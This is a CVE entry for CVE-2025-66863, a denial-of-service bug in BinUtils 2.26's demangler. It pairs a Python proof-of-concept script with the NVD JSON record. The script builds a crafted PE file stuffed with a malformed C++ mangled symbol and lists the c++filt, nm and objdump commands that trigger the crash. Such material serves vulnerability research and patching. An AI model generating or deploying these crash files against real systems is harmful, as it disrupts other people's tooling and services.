CVE-2025-66863

#!/usr/bin/env python3 """ CVE-2025-66863 PoC - BinUtils cp-demangle.c d_discriminator DoS This PoC demonstrates a crafted PE file that can trigger denial of service in BinUtils 2.26 when processing C++ mangled symbols. """ import struct def create_malformed_pe(): """ Create a minimal PE file with malformed C++ mangled symbol that triggers d_discriminator function vulnerability """ # PE Header pe_header = bytearray() # DOS Header (minimal) pe_header += b'MZ' # DOS signature pe_header += b'\x00' * 58 pe_header += struct.pack('<I', 64) # PE header offset # PE Signature pe_header += b'PE\x00\x00' # COFF Header pe_header += struct.pack('<H', 0x014c) # Machine (i386) pe_header += struct.pack('<H', 1) # NumberOfSections pe_header += struct.pack('<I', 0) # TimeDateStamp pe_header += struct.pack('<I', 0) # PointerToSymbolTable pe_header += struct.pack('<I', 0) # NumberOfSymbols pe_header += struct.pack('<H', 224) # SizeOfOptionalHeader pe_header += struct.pack('<H', 0x0102) # Characteristics # Optional Header (standard) pe_header += struct.pack('<H', 0x010b) # Magic (PE32) pe_header += b'\x0e' # LinkerVersion pe_header += struct.pack('<I', 0x1000) # SizeOfCode pe_header += struct.pack('<I', 0) # SizeOfInitializedData pe_header += struct.pack('<I', 0) # SizeOfUninitializedData pe_header += struct.pack('<I', 0x1000) # AddressOfEntryPoint pe_header += struct.pack('<I', 0x1000) # BaseOfCode pe_header += struct.pack('<I', 0) # BaseOfData pe_header += struct.pack('<I', 0x400000) # ImageBase pe_header += struct.pack('<I', 0x1000) # SectionAlignment pe_header += struct.pack('<I', 0x200) # FileAlignment pe_header += struct.pack('<H', 4) # OSVersion pe_header += struct.pack('<H', 0) # ImageVersion pe_header += struct.pack('<H', 0) # SubsystemVersion pe_header += struct.pack('<I', 0) # Win32VersionValue pe_header += struct.pack('<I', 0x5000) # SizeOfImage pe_header += struct.pack('<I', 0x200) # SizeOfHeaders pe_header += struct.pack('<I', 0) # CheckSum pe_header += struct.pack('<H', 3) # Subsystem pe_header += struct.pack('<H', 0) # DllCharacteristics pe_header += struct.pack('<I', 0x100000) # SizeOfStackReserve pe_header += struct.pack('<I', 0x1000) # SizeOfStackCommit pe_header += struct.pack('<I', 0x100000) # SizeOfHeapReserve pe_header += struct.pack('<I', 0x1000) # SizeOfHeapCommit pe_header += struct.pack('<I', 0) # LoaderFlags pe_header += struct.pack('<I', 16) # NumberOfRvaAndSizes # Data Directories (empty) pe_header += b'\x00' * 128 # Section Header (.text) pe_header += b'.text\x00' # Name pe_header += struct.pack('<I', 0x1000) # VirtualSize pe_header += struct.pack('<I', 0x1000) # VirtualAddress pe_header += struct.pack('<I', 0x200) # SizeOfRawData pe_header += struct.pack('<I', 0x200) # PointerToRawData pe_header += struct.pack('<I', 0) # PointerToRelocations pe_header += struct.pack('<I', 0) # PointerToLinenumbers pe_header += struct.pack('<H', 0) # NumberOfRelocations pe_header += struct.pack('<H', 0) # NumberOfLinenumbers pe_header += struct.pack('<I', 0x60000020) # Characteristics # Section Data with crafted mangled symbol section_data = bytearray() # Crafted C++ mangled symbol that triggers d_discriminator # Pattern: _Z + deeply nested discriminator + malformed data mangled_symbol = b'_Z' + b'D' * 1000 + b'\xff\xff\xff\xff' * 100 section_data += mangled_symbol section_data += b'\x00' * (0x200 - len(section_data)) pe_file = pe_header + section_data return pe_file def main(): print("[*] CVE-2025-66863 PoC Generator") print("[*] Target: BinUtils 2.26 cp-demangle.c d_discriminator") # Generate malicious PE file pe_data = create_malformed_pe() # Save the PoC file output_file = 'CVE-2025-66863_poc.exe' with open(output_file, 'wb') as f: f.write(pe_data) print(f"[+] PoC file created: {output_file}") print(f"[+] File size: {len(pe_data)} bytes") print("\n[*] To trigger the vulnerability:") print(f" $ c++filt < {output_file}") print(f" $ nm {output_file}") print(f" $ objdump -d {output_file}") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-66863", "sourceIdentifier": "[email protected]", "published": "2025-12-29T17:15:46.203", "lastModified": "2026-01-14T19:38:31.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in function d_discriminator in file cp-demangle.c in BinUtils 2.26 allows attackers to cause a denial of service via crafted PE file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:2.26:*:*:*:*:*:*:*", "matchCriteriaId": "7A0BCBA2-7605-4976-8364-E6D1484D0CA9"}]}]}], "references": [{"url": "https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash2.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}